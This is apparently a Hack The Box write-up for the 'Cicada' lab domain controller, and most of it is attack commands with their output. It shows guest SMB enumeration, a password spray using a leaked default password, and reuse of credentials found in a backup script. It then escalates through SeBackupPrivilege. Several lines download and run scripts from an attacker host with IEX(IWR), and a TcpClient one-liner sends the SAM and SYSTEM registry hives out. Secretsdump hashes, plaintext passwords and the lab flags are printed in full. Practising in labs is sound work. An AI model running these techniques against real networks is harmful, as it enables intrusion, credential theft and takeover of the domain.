Cicada

Recon

nmap_scan.log|h-50%_styled

SMB

└─$ netexec smb 10.129.52.9 -u 'guest' -p '' --shares
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.52.9     445    CICADA-DC        [*] Enumerated shares
SMB         10.129.52.9     445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.52.9     445    CICADA-DC        -----           -----------     ------
SMB         10.129.52.9     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.52.9     445    CICADA-DC        C$                              Default share
SMB         10.129.52.9     445    CICADA-DC        DEV
SMB         10.129.52.9     445    CICADA-DC        HR              READ
SMB         10.129.52.9     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.52.9     445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.129.52.9     445    CICADA-DC        SYSVOL                          Logon server share

Guest

Creds: guest:<BLANK>

└─$ smbclient -U 'cicada.htb\\guest' //10.129.52.9/HR
Password for [guest]: # Blank,just enter
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 267725 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)
└─$ cat Notice\ from\ HR.txt
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Password Spray

└─$ netexec smb 10.129.52.9 -u 'guest' -p '' --rid-brute | tee rid-brute.log
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.52.9     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
└─$ grep 'User' rid-brute.log | awk '{print($6)}' > users.txt
└─$ netexec smb 10.129.52.9 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.52.9     445    CICADA-DC        [+] CICADA\Protected:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

Creds: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

LDAP Enumeration (michael.wrightson)

Active Directory Enumeration with Mastertul

Cicada-Mastertul

└─$ py cicada-mastertul.py --setup
└─$ py cicada-mastertul.py -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb -t 10.129.52.9 --full
Writeup.png

Creds: david.orelious:aRt$Lp#7t*VQ!3

david.orelious

└─$ netexec smb 10.129.52.9 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.129.52.9     445    CICADA-DC        [*] Enumerated shares
SMB         10.129.52.9     445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.52.9     445    CICADA-DC        -----           -----------     ------
SMB         10.129.52.9     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.52.9     445    CICADA-DC        C$                              Default share
SMB         10.129.52.9     445    CICADA-DC        DEV             READ
SMB         10.129.52.9     445    CICADA-DC        HR              READ
SMB         10.129.52.9     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.52.9     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.52.9     445    CICADA-DC        SYSVOL          READ            Logon server share
└─$ smbclient -U 'cicada.htb\\david.orelious%aRt$Lp#7t*VQ!3' //10.129.52.9/DEV
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 267229 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit

emily.oscars

└─$ cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
└─$ netexec smb 10.129.52.9 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --shares
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
SMB         10.129.52.9     445    CICADA-DC        [*] Enumerated shares
SMB         10.129.52.9     445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.52.9     445    CICADA-DC        -----           -----------     ------
SMB         10.129.52.9     445    CICADA-DC        ADMIN$          READ            Remote Admin
SMB         10.129.52.9     445    CICADA-DC        C$              READ,WRITE      Default share
SMB         10.129.52.9     445    CICADA-DC        DEV
SMB         10.129.52.9     445    CICADA-DC        HR              READ
SMB         10.129.52.9     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.52.9     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.52.9     445    CICADA-DC        SYSVOL          READ            Logon server share

Creds: emily.oscars:Q!3@Lp#M6b*7t*Vt

User.txt

└─$ evil-winrm -i 10.129.52.9 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> cat Desktop/user.txt
5d06034ac3b70457a11097d99e13d7f7

Privilege Escalation

└─$ bloodhound-python -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -c all -op emily --zip -d cicada.htb -ns 10.129.52.9
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20240928153115_bloodhound.zip

Nothing much valuable, except that we are part of Backup Operators group.

Writeup-1.png

She's the only user that has home directory.

*Evil-WinRM* PS C:\> ls Users
    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/26/2024   1:10 PM                Administrator
d-----         8/22/2024   2:22 PM                emily.oscars.CICADA
d-r---         3/14/2024   3:45 AM                Public

Nothing interesting...

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\AppData\Local\Temp> IEX(IWR http://10.10.14.58/adPEAS.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\AppData\Local\Temp> Invoke-adPEAS

SeBackupPrivilege

Check whoami

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> whoami /all
 
User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeBackupPrivilege looks interesting.https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokenshttps://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#local-attack

└─$ curl -LOq https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/refs/heads/master/Privesc/Acl-FullControl.ps1
---
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> IEX(IWR http://10.10.14.58/Acl-FullControl.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> Acl-FullControl -user 'CICADA.HTB\emily.oscars.CICADA' -path 'C:\Users\Administrator\Desktop'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> get-acl * | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : CICADA\Domain Users
Access : CICADA\Administrator Allow  FullControl
         CICADA\emily.oscars Deny  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         CICADA\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:AI(A;;FA;;;LA)(D;ID;FA;;;S-1-5-21-917908876-1423158569-3159038727-1601)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)

Acl-FullControl fails to give access and it's most probably because the Access is denied.

https://github.com/giuliano108/SeBackupPrivilege/tree/master

Root.txt

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> IWR http://10.10.14.58/SeBackupPrivilegeCmdLets.dll -out SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> IWR http://10.10.14.58/SeBackupPrivilegeUtils.dll -out SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege /Users/Administrator/Desktop/root.txt flag.txt -Overwrite

Hashdump

└─$ listen 4444 > sam.save
└─$ listen 4445 > system.save
---
reg save hklm\sam sam.save
reg save hklm\system system.save

$server = "10.10.14.58"; $port = 4444; 
$filePath = "C:\Users\emily.oscars.CICADA\Documents\t\sam.save"; $tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port); $networkStream = $tcpClient.GetStream(); $fileBytes = [System.IO.File]::ReadAllBytes($filePath); $networkStream.Write($fileBytes, 0, $fileBytes.Length); $networkStream.Flush(); $networkStream.Close(); $tcpClient.Close()
$port = 4445;
$filePath = "C:\Users\emily.oscars.CICADA\Documents\t\system.save"; $tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port); $networkStream = $tcpClient.GetStream(); $fileBytes = [System.IO.File]::ReadAllBytes($filePath); $networkStream.Write($fileBytes, 0, $fileBytes.Length); $networkStream.Flush(); $networkStream.Close(); $tcpClient.Close()
---
└─$ impacket-secretsdump -sam sam.save -system system.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Creds: Administrator:2b87e7c93a3e8a0ea4a581937016f341

└─$ evil-winrm -i 10.129.52.9 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
3ffea962422f28b012d9e50c17404518
Writeup-2.png
robocopy /b C:\Users\Administrator\Desktop C:\programdata root.txt

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy

Good resource: https://kb.offsec.nl/tools/techniques/backupoperatortoda/

From Dark_Man again:

Similar project: https://github.com/improsec/BackupOperatorToolkit

Note: The administrator account in SAM is a local account and its hash is different from domain admin hash. To be able to use this local account, use must enable DSRM mode by modifying the registry key. in this machine, the two are the same, but it's not always as this.

PreviousChemistryNextInfiltrator

Last updated